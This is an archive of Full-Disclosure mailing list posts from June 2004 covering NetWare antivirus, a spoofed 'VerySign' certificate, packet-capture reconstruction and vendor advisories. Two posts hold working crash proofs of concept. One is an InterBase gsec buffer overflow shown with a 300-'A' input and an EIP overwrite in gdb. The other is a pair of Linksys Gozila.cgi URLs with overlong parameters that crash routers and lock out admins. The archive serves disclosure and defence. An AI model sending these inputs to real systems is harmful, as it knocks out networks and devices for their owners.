The permissions are set in the nwadmin tool, and its not unlike how you set permissions in NT/AD. It is also a generally easy task to figure out the source of the incursion if the infected files if they haven't been moved into quarantine by checking the properties on them. Permissions have to be set for the functions required by the hosting process or content residing on the host server which may have specific acls, or lack therof, applie. Especially where dynamic data creation is involved, there's no good reason not to be running realtime av on netweare servers. But if you bump into a problem, you can always run a sweep from a different system that is running av by mapping a drive to the netware system and choosing to run a scan on that drive. But it would be better to have realtime av on the boxes. And, you have to treat latent infectious content with a grain of salt if you don't know the mitigating controls in place in your network, largely because of what Nimda did with riched20, and also because you don't know how people might be opening up shares on your network to general "browsing". G Best Gaby -----Original Message----- From: Gadi Evron To: Dowling, Gabrielle CC: full-disclosure at lists.netsys.com Sent: Mon May 31 10:25:29 2004 Subject: Re: [Full-Disclosure] Cleanining viruses from netware -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 | I'm not aware of anything that can actually infect a netware system, just things that can drop latent infectious content when write rights are relatively open. I am not much of a netware guy, can you please explain what I need to check regarding permissions, and where? What should they be set? What are you referring to? I was referring to simply scanning every computer on the network, however, there were viruses found on file servers with netware shares, if that is what they are called. Network drives? Gadi. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (MingW32) iD8DBQFAu0BXqH6NtwbH1FARAq9FAJ9wC5mbuxKMimkVKQZMmIYEfGbGcQCbBcmH 07YT9Gt0q+SqywPZbDEPxKI= =FwY2 -----END PGP SIGNATURE----- ********************************************************************** This e-mail is sent by a law firm and contains information that may be privileged and confidential. If you are not the intended recipient, please delete the e-mail and notify us immediately. *********************************************************************** -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040602/03a633a3/attachment.html From krahmer at suse.de Wed Jun 2 09:26:06 2004 From: krahmer at suse.de (Sebastian Krahmer) Date: Wed, 2 Jun 2004 10:26:06 +0200 (CEST) Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate? In-Reply-To: References: Message-ID: On Wed, 2 Jun 2004, Chris van der Pennen wrote: Hi, Depending on your trusted-CA package for your SSL client, this should not verify. There are various ways to confuse SSL clients. Especially GUI based web-browsers allow to play tricks where you cant decide whether you are prompted a correct certificate. Some do not check the signature at all. If in doubt, if there is any popup on a HTTPS site, theres someone playing games. I am going to release slides from a speach regarding that topic soon. (in german unfortunally) Sebastian > I've been getting SSL certificates from various websites recently that are > apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign. > The certificate expired 6 December 2002. > > The data in Issued To and Issued By are identical. > > This smells very much like an SSL hijack attempt - can anyone shed some > light on the situation? > > Chris > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > -- ~ ~ perl self.pl ~ $_='print"\$_=\47$_\47;eval"';eval ~ krahmer at suse.de - SuSE Security Team ~ From aditya.deshmukh at online.gateway.technolabs.net Wed Jun 2 04:27:51 2004 From: aditya.deshmukh at online.gateway.technolabs.net (Aditya, ALD [Aditya Lalit Deshmukh]) Date: Wed, 2 Jun 2004 08:57:51 +0530 Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate? In-Reply-To: Message-ID: > I've been getting SSL certificates from various websites recently that are > apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign. > The certificate expired 6 December 2002. this is a valid attempt > The data in Issued To and Issued By are identical. no big deal in this type of cert these certs can be created by anyone, except that verisign cert would not have been accepted by the browser, that is why we have trusted Certifacate authorities which do the validation of the certs. > This smells very much like an SSL hijack attempt - can anyone shed some > light on the situation? if this is your site, please revoke the cert and make a new one or if u know the site owner please alert the site owner as well as versisign -aditya ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) From noamr at beyondsecurity.com Wed Jun 2 08:43:25 2004 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Wed, 2 Jun 2004 10:43:25 +0300 Subject: [Full-Disclosure] Firebird Database Remote Database Name Overflow In-Reply-To: <3CF95025.7090202@secnetops.com> References: <200406012040.14839.aviram@beyondsecurity.com> <3CF95025.7090202@secnetops.com> Message-ID: <200406021043.25680.noamr@beyondsecurity.com> On Sunday 02 June 2002 01:52, KF (lists) wrote: > So is this firebird specific or does it also impact Borland Interbase > users? > -KF > We haven't tested Borland's Interbase as we didn't have any installation available for testing. However I can assume that since this vulnerability appears in version 1.0.2, which is of very close resemblance to Borland's Interbase sources, that the vulnerability may also affect it. -- Thanks Noam Rathaus CTO Beyond Security Ltd. Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441 From lists2 at onryou.com Wed Jun 2 13:24:30 2004 From: lists2 at onryou.com (Cory Donnelly) Date: Wed, 02 Jun 2004 08:24:30 -0400 Subject: [Full-Disclosure] RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability In-Reply-To: <20040601235942.GS19402@alcor.net> References: <20040601211332.GB1538@lupe-christoph.de> <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> <20040601235942.GS19402@alcor.net> Message-ID: <40BDC6FE.6060907@onryou.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Matt Zimmerman wrote: > Such vendors/developers are doing a their users and the community a > disservice. Proper public disclosure of vulnerabilities requires very > little effort on their part; there is no good reason to conceal > information this way. There is no need to contact every downstream > vendor directly; they monitor the usual channels. - From the shortsighted developer's perspective there are *plenty* of very compelling reasons to discreetly fix vulnerabilities. A developer may be wary of losing his/her job should management learn of the gaff. A developer's pride may prevent him/her from notifying the appropriate folks in his/her organization. A developer may not realize the seriousness of a vulnerability (or may fix it accidentally). Management may pressure the developer to keep the changelog positive, using the argument that all documentation associated with their software must go through the PR department. Obviously the world would be a better place if these disclosures were made (and made consistently), but there are plenty of good reasons (depending on perspective) to keep quiet about bug fixes. Regardless, we've strayed off-topic -- Roman's original point about how backporting security patches to debian-stable only works when debian-stable backporters are aware of vulnerabilities is absolutely correct. take care, Cory -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (MingW32) iD8DBQFAvcb+okBdAgPGOhURAsr6AKC9Tii2d3A1YxE+YEH49UULnTjywQCfdYnF 9ZpToiNm++VzwFH8IvLNBDw= =/P6/ -----END PGP SIGNATURE----- From erwinp21 at hotmail.com Wed Jun 2 12:42:22 2004 From: erwinp21 at hotmail.com (- -) Date: Wed, 02 Jun 2004 11:42:22 +0000 Subject: [Full-Disclosure] IBM Potential Credential Impersonation Attack paper? Message-ID: Hi List, I found the following IBM advisory via their outside advisory service: http://www-1.ibm.com/support/docview.wss?uid=swg21168762 They refer to an externally available paper that identifies a form of credential impersonation exploit that can affect multiple IBM products. Does anybody know which paper IBM is refering to? I tried google, but I couldn' t find anything. Regards, Erwin. _________________________________________________________________ Getting married? Find great tips, tools and the latest trends at MSN Life Events. http://lifeevents.msn.com/category.aspx?cid=married From brendan.gregg at tpg.com.au Wed Jun 2 15:49:52 2004 From: brendan.gregg at tpg.com.au (Brendan Gregg) Date: Thu, 3 Jun 2004 00:49:52 +1000 (EST) Subject: [Full-Disclosure] PCAP and LP In-Reply-To: <20040530080007.846.75274.Mailman@NETSYS.COM> Message-ID: G'Day Ian, ----- Original Message ----- > From: Ian Latter (Ian.Latter_at_mq.edu.au) > Date: Jun 01 2004 > > Hello Ali, > > According to the FAQ, this doesn't look entirely possible; > > [...] > 4.10 Replaying Client Traffic to a Server > > A common question on the tcpreplay-users list is how > [...] > > From; http://tcpreplay.sourceforge.net/FAQ.html > > I've had one other suggestion, and that is contacting the author > of "chaosreader" (with greenback or source); > > http://users.tpg.com.au/bdgcvb/chaosreader.html > > 's'cool ... I'll fish the web a little more and see what comes out ... if > nothing comes out, and I can't make a quick contribution to > chaosreader, then I'll probably change the target host to acquire > the asset via another protocol (http/smtp/etc). > Chaosreader can retrieve print jobs with a little help, # snoop -o /tmp/out1 port 515 Using device /dev/hme (promiscuous mode) 205 ^C # # ../chaosreader -v /tmp/out1 Chaosreader ver 0.94 Opening, /tmp/out1 Reading file contents, 100% (251376/251376) Reassembling packets, 100% (205/205) Creating files... Num Session (host:port <=> host:port) Service 0001 192.168.1.5:1021,192.168.1.1:515 printer index.html created. # # ls -l *.raw* -rw-r--r-- 1 brendan 231678 Jun 3 00:21 session_0001.printer.raw -rw-r--r-- 1 brendan 5 Jun 3 00:21 session_0001.printer.raw1 -rw-r--r-- 1 brendan 231673 Jun 3 00:21 session_0001.printer.raw2 Now if I "vi session_0001.printer.raw2" and remove the top 2 and bottom 9 lines, I have the original PostScript file (cksums ok). (Your capture may vary a little, but it should be obvious where the PostScript begins and ends). Or if I didn't want to use vi, # perl -e 'push(@A,$_) while(<>); print @A[2..($#A-10)]' \ session_0001.printer.raw2 > lp.ps It would be nice if Chaosreader automatically did this - I guess I should add it for the next release. If anyone would like to make a quick contribution you are welcome to send me small sample capture files (snoop or tcpdump). :) PS. the most stable link is, http://www.brendangregg.com/chaosreader.html no worries, Brendan Gregg [Sydney, Australia] > ----- Original Message ----- > >From: "Ali-Reza Anghaie" > >To: "Ian Latter" > >Subject: Re: [Full-Disclosure] PCAP and LP > >Date: Tue, 01 Jun 2004 23:12:19 -0400 > > > > On Tue, 2004-06-01 at 23:32, Ian Latter wrote: > > > Quick question, I'm going through the results of an investigation > > > and have a PCAP file that contains Line Printing ... I'd like to > > > reconstruct the postscript files (or just reprint them), is there a > > tool that will allow this? [...] From tpohl at computerbild.de Wed Jun 2 17:14:42 2004 From: tpohl at computerbild.de (tpohl at computerbild.de) Date: Wed, 2 Jun 2004 18:14:42 +0200 Subject: [Full-Disclosure] Autoreply: Full-Disclosure digest, Vol 1 #1685 - 26 msgs Message-ID: Ich bin bis zum 07.06.2004 nicht im Hause. In dringenden F?llen bitte die 040/347-28000 anrufen. Ihre Mail wird nicht weitergeleitet! Mit freundlichen Gr??en Thomas Pohl ASmediaSystems Operations DCS Computerbild Axel Springer AG Axel-Springer-Platz 1 20350 Hamburg Tel.: +49 40 347 26301 Fax: +49 40 347 16301 Thomas.Pohl at axelspringer.de From Valdis.Kletnieks at vt.edu Wed Jun 2 17:45:09 2004 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 02 Jun 2004 12:45:09 -0400 Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate? In-Reply-To: Your message of "Wed, 02 Jun 2004 07:39:31 +0930." References: Message-ID: <200406021645.i52Gj9F9012756@turing-police.cc.vt.edu> On Wed, 02 Jun 2004 07:39:31 +0930, Chris van der Pennen said: > I've been getting SSL certificates from various websites recently that are > apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign. > The certificate expired 6 December 2002. > The data in Issued To and Issued By are identical. > This smells very much like an SSL hijack attempt - can anyone shed some > light on the situation? Or some webserver package that builds a self-signed certificate so SSL works without having to pay Verisign, and does so in a "cute" manner that users are likely to accept the cert without thinking about it. It's probably NOT a hijack attempt unless you have *OTHER* evidence of that (phishy-looking redirect javascript on the page, etc....) Given how little *real* security a signed cert creates, it's probably not worth worrying about. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040602/9f452906/attachment.bin From nicola at delvacchio.it Wed Jun 2 18:26:58 2004 From: nicola at delvacchio.it (Nicola Del Vacchio) Date: Wed, 02 Jun 2004 19:26:58 +0200 Subject: [Full-Disclosure] VerySign Class 1 Authority - bogus SSL certificate? In-Reply-To: <200406021645.i52Gj9F9012756@turing-police.cc.vt.edu> References: <200406021645.i52Gj9F9012756@turing-police.cc.vt.edu> Message-ID: <1086197218.2916.16.camel@localhost> it seems to me the fake certificates that a tool like ettercap iussues. compare whith this (fake) verificate. cheers nicola del vacchio security consultant genova italy nicola at delvacchio.it Il mer, 2004-06-02 alle 18:45, Valdis.Kletnieks at vt.edu ha scritto: > On Wed, 02 Jun 2004 07:39:31 +0930, Chris van der Pennen said: > > I've been getting SSL certificates from various websites recently that are > > apparently from a "VerySign Class 1 Authority" - note the 'y' in VerySign. > > The certificate expired 6 December 2002. > > > The data in Issued To and Issued By are identical. > > > This smells very much like an SSL hijack attempt - can anyone shed some > > light on the situation? > > Or some webserver package that builds a self-signed certificate so SSL works > without having to pay Verisign, and does so in a "cute" manner that users are > likely to accept the cert without thinking about it. It's probably NOT a hijack > attempt unless you have *OTHER* evidence of that (phishy-looking redirect > javascript on the page, etc....) > > Given how little *real* security a signed cert creates, it's probably not worth > worrying about. > -------------- next part -------------- A non-text attachment was scrubbed... Name: fake-verisign-ca1.cer Type: application/x-x509-ca-cert Size: 691 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040602/22ecfade/attachment.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Questa parte del messaggio =?ISO-8859-1?Q?=E8?= firmata Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040602/22ecfade/attachment-0001.bin From debian-security-announce at lists.debian.org Wed Jun 2 18:29:18 2004 From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org) Date: Wed, 2 Jun 2004 10:29:18 -0700 Subject: [Full-Disclosure] [SECURITY] [DSA 512-1] New gallery packages fix unauthenticated access Message-ID: <20040602172918.GL19402@alcor.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 512-1 security at debian.org http://www.debian.org/security/ Matt Zimmerman June 2nd, 2004 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : gallery Vulnerability : unauthenticated access Problem-Type : remote Debian-specific: no A vulnerability was discovered in gallery, a web-based photo album written in php, whereby a remote attacker could gain access to the gallery "admin" user without proper authentication. No CVE candidate was available for this vulnerability at the time of release. For the current stable distribution (woody), these problems have been fixed in version 1.2.5-8woody2. For the unstable distribution (sid), these problems have been fixed in version 1.4.3-pl2-1. We recommend that you update your gallery package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-8woody2.dsc Size/MD5 checksum: 573 1369280ce34db40a941ef4fae6f107a5 http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-8woody2.diff.gz Size/MD5 checksum: 7575 109d81ad481a7b6a197b5dd5b2a3eeaf http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5.orig.tar.gz Size/MD5 checksum: 132099 1a32e57b36ca06d22475938e1e1b19f9 Architecture independent components: http://security.debian.org/pool/updates/main/g/gallery/gallery_1.2.5-8woody2_all.deb Size/MD5 checksum: 137412 ebae6be30fe04acb993da74c9f54dcf0 These files will probably be moved into the stable distribution on its next revision. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAvg5kArxCt0PiXR4RAkWQAJ0beIP5URU0Wtz6oS21R35UniV8wwCgxUd2 SjSIIooMEHZjCAK2Lyxuc78= =x+ya -----END PGP SIGNATURE----- From koon at gentoo.org Wed Jun 2 19:05:13 2004 From: koon at gentoo.org (Thierry Carrez) Date: Wed, 02 Jun 2004 20:05:13 +0200 Subject: [Full-Disclosure] ERRATA: [ GLSA 200405-25 ] tla: Multiple vulnerabilities in included libneon Message-ID: <40BE16D9.7000605@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200405-25:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: tla: Multiple vulnerabilities in included libneon Date: June 2, 2004 Bugs: #51586 ID: 200405-25:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata ====== The fixed ebuild proposed in the original version of this Security Advisory did not address all the vulnerabilities of the tla package. All users of the tla package should upgrade to dev-util/tla-1.2-r2. The corrected sections appear below. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-util/tla <= 1.2-r1 >= 1.2-r2 dev-util/tla == 1.2.1_pre1 >= 1.2-r2 Description =========== Multiple format string vulnerabilities and a heap overflow vulnerability were discovered in the code of the neon library (GLSA 200405-01 and 200405-13). Current versions of the tla package include their own version of this library. Resolution ========== All users of tla should upgrade to the latest stable version: # emerge sync # emerge -pv ">=dev-util/tla-1.2-r2" # emerge ">=dev-util/tla-1.2-r2" Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200405-25.xml License ======= Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAvhbZvcL1obalX08RAjK1AKCRDB8GQ7OEplG5CyZhrMltMNDzBACfZhEs U6ErjQqSEonelS5vE3aKy5I= =EAkW -----END PGP SIGNATURE----- From debian-security-announce at lists.debian.org Wed Jun 2 20:09:04 2004 From: debian-security-announce at lists.debian.org (debian-security-announce at lists.debian.org) Date: Wed, 2 Jun 2004 12:09:04 -0700 Subject: [Full-Disclosure] [SECURITY] [DSA 499-2] New rsync packages fix directory traversal bug Message-ID: <20040602190904.GQ19402@alcor.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 499-2 security at debian.org http://www.debian.org/security/ Matt Zimmerman June 2nd, 2004 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : rsync Vulnerability : directory traversal Problem-Type : remote Debian-specific: no CVE Ids : CAN-2004-0426 A vulnerability was discovered in rsync, a file transfer program, whereby a remote user could cause an rsync daemon to write files outside of the intended directory tree. This vulnerability is not exploitable when the daemon is configured with the 'chroot' option. This update includes an additional fix related to the original vulnerability. For the current stable distribution (woody) this problem has been fixed in version 2.5.5-0.5. For the unstable distribution (sid), this problem has been fixed in version 2.6.1-1. We recommend that you update your rsync package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5.dsc Size/MD5 checksum: 545 94568a0080459dd6d8d84470a462b7dc http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5.diff.gz Size/MD5 checksum: 92695 66730a221c5d2d175ea9f58b0a1bac86 http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5.orig.tar.gz Size/MD5 checksum: 415156 39d76c62684750842d3884a77c2e5466 Alpha architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_alpha.deb Size/MD5 checksum: 227712 cc3046698f1aa151efdccc1dce1cb9f4 ARM architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_arm.deb Size/MD5 checksum: 206610 2cbcbb999e404b8d65167fe1dc540c52 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_i386.deb Size/MD5 checksum: 194854 62116c48c3ed4d29e110b35b92046761 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_ia64.deb Size/MD5 checksum: 255716 90e274e9a84ab1703fe36bffee656712 HP Precision architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_hppa.deb Size/MD5 checksum: 214430 0e0ec89aeeb8e24335b1f8baf933bc6d Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_m68k.deb Size/MD5 checksum: 190008 9ac8acc88490fd3337a1a588702f0a2c Big endian MIPS architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_mips.deb Size/MD5 checksum: 216470 fca9b734baf43b434e0bae182b879a6a Little endian MIPS architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_mipsel.deb Size/MD5 checksum: 216746 1ca2e9a76353d4c30f0137cc6c385177 PowerPC architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_powerpc.deb Size/MD5 checksum: 205832 c9f08359ae6453e7f31b907aaa7dd960 IBM S/390 architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_s390.deb Size/MD5 checksum: 205090 0f9013705deb8a7c70b3d3a3995b722b Sun Sparc architecture: http://security.debian.org/pool/updates/main/r/rsync/rsync_2.5.5-0.5_sparc.deb Size/MD5 checksum: 205542 1d8c456c899a37c52cafe20b30f87025 These files will probably be moved into the stable distribution on its next revision. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFAviW/ArxCt0PiXR4RAq0xAJ46Z9xVC71WK7NaO/uvdopuVWueqQCgsnuC cTAsMUOO2GOoREGty44NEa4= =nl0I -----END PGP SIGNATURE----- From roman at rs-labs.com Wed Jun 2 23:10:05 2004 From: roman at rs-labs.com (Roman Medina) Date: Thu, 03 Jun 2004 00:10:05 +0200 Subject: [Full-Disclosure] Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability In-Reply-To: <20040601235942.GS19402@alcor.net> References: <20040601211332.GB1538@lupe-christoph.de> <424qb0hejaasctgams01s0hd8s1roapkc7@4ax.com> <20040601235942.GS19402@alcor.net> Message-ID: On Tue, 1 Jun 2004 16:59:42 -0700, you wrote: >On Wed, Jun 02, 2004 at 01:49:01AM +0200, Roman Medina wrote: > >> In other words, many vendors/developers silently fixes bugs and they don't >> necesarily have to know who is packaging their software and inform them. > >this way. There is no need to contact every downstream vendor directly; >they monitor the usual channels. ---- #ifdef _security_perspective_ #define usual_channels bugtraq other_lists #endif #ifdef _devel_perspective_ #define usual_channels changelog_file #endif printf("My usual channels are: %s", usual_channels); ---- It was some kind of pseudocode :-) Question: which perspective are using Debian maintainers to monitorize their packages? In the particular case of SM, the old XSS issues were listed in ChangeLog, but .deb package was not updated. Why? Saludos, --Roman -- PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] From kf_lists at secnetops.com Thu Jun 3 03:03:51 2004 From: kf_lists at secnetops.com (KF (lists)) Date: Wed, 02 Jun 2004 22:03:51 -0400 Subject: [Full-Disclosure] Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow In-Reply-To: <200406021043.25680.noamr@beyondsecurity.com> References: <200406012040.14839.aviram@beyondsecurity.com> <3CF95025.7090202@secnetops.com> <200406021043.25680.noamr@beyondsecurity.com> Message-ID: <40BE8707.6090707@secnetops.com> Someone that has had some success communicating things security wise to Borland may wish to contact them about this. [root at CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm [kf at CloneRiot bin]$ pwd /opt/interbase/bin [kf at CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'` (gdb) c Continuing. [New Thread 1085279152 (LWP 21355)] [New Thread 1095769008 (LWP 21356)] [New Thread 1106258864 (LWP 21357)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1085279152 (LWP 21355)] 0x41414141 in ?? () (gdb) bt #0 0x41414141 in ?? () #1 0x41414141 in ?? () #2 0x41414141 in ?? () ... #35 0x41414141 in ?? () #36 0x41414141 in ?? () (gdb) (gdb) i r eax 0x0 0 ecx 0x82025e4 136324580 edx 0x0 0 ebx 0x81fe29c 136307356 esp 0x40aff5f8 0x40aff5f8 ebp 0x41414141 0x41414141 esi 0x12c 300 edi 0x40affab8 1085274808 eip 0x41414141 0x41414141 eflags 0x10246 66118 (gdb) x/1s $esp 0x40aff5f8: 'A' [root at CloneRiot interbase]# ./bin/ibserver Segmentation fault -KF Noam Rathaus wrote: >On Sunday 02 June 2002 01:52, KF (lists) wrote: > > >>So is this firebird specific or does it also impact Borland Interbase >>users? >>-KF >> >> >> >We haven't tested Borland's Interbase as we didn't have any installation >available for testing. However I can assume that since this vulnerability >appears in version 1.0.2, which is of very close resemblance to Borland's >Interbase sources, that the vulnerability may also affect it. > > > From etomcat at freemail.hu Thu Jun 3 08:23:42 2004 From: etomcat at freemail.hu (Feher Tamas) Date: Thu, 3 Jun 2004 09:23:42 +0200 (CEST) Subject: [Full-Disclosure] Unidentified flying object code downs UK civilian airspace? Message-ID: http://news.bbc.co.uk/2/hi/uk_news/3772077.stm http://www.cnn.com/2004/WORLD/europe/06/03/britain.flight/index.html Massive air disruption across UK Thousands of air passengers are facing delays after an air traffic control computer failure caused flights to be suspended across the UK. National Air Traffic Services said flights were grounded so that controllers could prioritise on planes in the air, but safety was unaffected. The air traffic control centre at West Drayton is now fully operational again but most flights remain on hold. Many airports are advising people to check in as normal but delays continue. Adrian Yalland, spokesman for Nats, said: "Our computer system is now fully operational and safety being our primary concern we are now working to make sure those aircraft in the air and in need of landing should be able to do so to clear the delays." He said the fault was thought to lie with the "flow of data" in the system. "The reasons why planes were grounded was because we couldn't let them into the air which would add more complications. " Mr Yalland added: "The system is not going to go down again." [That could mean it is not going to be brought back online, ever. - me] BBC transport correspondent Tom Symonds says the affected computer systems were not those that handle the separation of aircraft in the air. He says the fault was in what is known as the host control system, a two-year-old computer system at West Drayton. The system handles flight strips which are the basic details of flights coming in and out of the UK. From b0fnet at yahoo.com Thu Jun 3 09:31:06 2004 From: b0fnet at yahoo.com (b0f) Date: Thu, 3 Jun 2004 01:31:06 -0700 (PDT) Subject: [Full-Disclosure] DoS vuln in various versions of Linksys routers. Message-ID: <20040603083106.3508.qmail@web14606.mail.yahoo.com> Denial of Service Vulnerability in Linksys BEFSR41 - Router vuln was identified and tested on. Linksys BEFSR41 v3 Linksys BEFSRU31 Linksys BEFSR11 Linksys BEFSX41 Linksys BEFSR81 v2/v3 Linksys BEFW11S4 v3 Linksys BEFW11S4 v4 Available from www.linksys.com October 19, 2003 (Revised November 10, 2003) Released Date: 3rd June 2004 NOTE: THIS ADVISORY WAS ORIGINALLY WITTEN FOR THE Linksys BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch I. BACKGROUND Linksys Group Inc.'s EtherFast Cable/DSL Router with 4-Port Switch "is the perfect option to connect multiple PCs to a high-speed Broadband Internet connection or to an Ethernet back-bone. Allowing up to 253 users, the built-in NAT technology acts as a firewall protecting your internal network." More information about it is available at http://www.linksys.com/products/product.asp?prid=20&grid=23 II. DESCRIPTION It is possible for a remote/local attacker to crash the linksys router and leave it in a state that it can't be accessed even after reboot due to an invalid password. An attacker could set up a web page or send an html email to someone inside the LAN to indirectly send commands to the router. An attacker could specify a URL that results in denial of service. The DoS Occurs when 2 long strings are sent to the sysPasswd and sysPasswdConfirm Parameters on the Gozila.cgi script, about 150 characters to each parameter Seems to work fine. If an attacker can get the admin of the router to view a link Or goto a webpage that links to such a link as this. http://192.168.1.1/Gozila.cgi?sysPasswd=AAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&sysPasswdConfirm=AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA&UPnP_Work=1&FactoryDefaults=0 The router will drop all internet connections making the internet inaccessible from the LAN even if the router is powered off and back on. It also seems to change the password in such a way that the admin can't log back into the router and the only way to solve it is by pressing the factory reset button on the front of the router, Which will then reset all previously stored settings and reset the password back to factory default 'admin'. The router would then need to be set back up again from scratch. REVISED NOVEMBER 10, 2003 On November 10 2003 I found another overflow in linksys router which is a similar attack method to the first vuln in this advisory. The DoS occurs in this attack when a long string about 350 characters is passed to the 'DomainName' parameter of the Gozila.cgi script. An example of this attack would be to get the admin of a router to visit a link like this. http://192.168.1.1/Gozila.cgi?hostName=&DomainName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 